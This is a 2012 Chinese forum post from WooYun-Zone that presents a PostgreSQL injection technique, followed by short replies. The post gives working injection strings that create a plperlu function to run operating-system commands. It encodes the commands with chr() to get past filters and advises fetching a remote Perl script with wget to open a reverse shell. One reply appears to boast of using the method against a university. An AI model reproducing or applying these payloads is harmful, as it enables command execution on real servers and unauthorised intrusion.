postgresql “初级”注入大法

  • A+
所属分类:WooYun-Zone

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;

select id();

id()为创建函数名,可以自定义随便写

chr(108).chr(105)是需要执行的命令id的asc编码

自己把需要执行的命令换成chr替换就行了,具体就是wget http://les.la/c.pl -O /tmp/c.pl  

删除函数为drop function id(); 然后再执行此反弹shell的命令

此大法可对付一切8.0以上的版本(含8.0)

以下为实际注入时的表现形式

xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;–

xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null–

postgresql “初级”注入大法

  1. 1#

    Xhm1n9 | 2012-11-12 21:09

    学习了

  2. 2#

    伟大娃娃 (٩[·̮̃·̃]۶٩[·̮̃·̃]۶) | 2012-11-13 00:37

    学习,求推荐好的PGSQL注入文章或工具.

  3. 3#

    xsser | 2012-11-13 09:25

    注意领域主页右边

  4. 4#

    saber (终极屌丝之路~) | 2012-11-13 09:32

    学习了 不过觉得第一种好坑人~

  5. 5#

    无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2012-11-13 10:31

    以前搞东京大学的时候研究过

  6. 6#

    teamtopkarl | 2012-12-11 07:49

    sqlmap就可以注入